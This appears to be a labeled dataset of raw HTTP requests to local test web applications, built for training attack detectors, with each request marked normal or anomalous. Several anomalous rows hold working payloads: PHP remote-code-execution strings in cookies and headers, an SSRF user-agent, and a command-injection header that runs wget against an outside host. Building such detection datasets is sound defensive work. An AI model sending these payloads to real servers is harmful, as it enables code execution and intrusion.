raw_request
stringlengths
2
1.93k
label
stringclasses
2 values
attack_type
stringclasses
11 values
GET /api/Challenges HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0....
normal
Normal
POST /rest/captcha?page=apple HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Refe...
normal
Normal
POST /rest/captcha HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1...
normal
Normal
POST /search HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http:/...
normal
Normal
GET /account HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: ftp://localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SSRF
anomalous
Server-Side Request Forgery
GET /api/Challenges HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
POST /api/Challenges HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: RCE Cookie: assert($_GET[1], 'r');%0a Content-Length: 0
anomalous
Remote Code Execution
POST /api/Challenges HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: RCE Cookie: assert($_SERVER['%0aHTTP_CMD'%0a], '%0ar'%0a); Content-Length: 0
anomalous
Remote Code Execution
POST /api/Challenges HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
POST /vulnerabilities/exec/ HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: COMMAND Content-Type: application/x-www-form-urlencoded Cookie: security=low; PHP...
anomalous
Command Injection
GET /account HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
GET /rest/products/search?q=mango HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
GET /rest/products/search?search=banana HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-...
normal
Normal
GET /settings HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: RCE X-Custom-Header: proc_open($_REQUEST['cmd'], 'r');chr(105).chr(100)
anomalous
Remote Code Execution
GET /login.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: COMMAND X-Command: system('wget https://xerosecurity.com/.testing/rce_vuln.txt'); Cookie: PHPS...
anomalous
Command Injection
POST /rest/user/whoami?page=lemon HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-...
normal
Normal
POST /api/Challenges HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http...
normal
Normal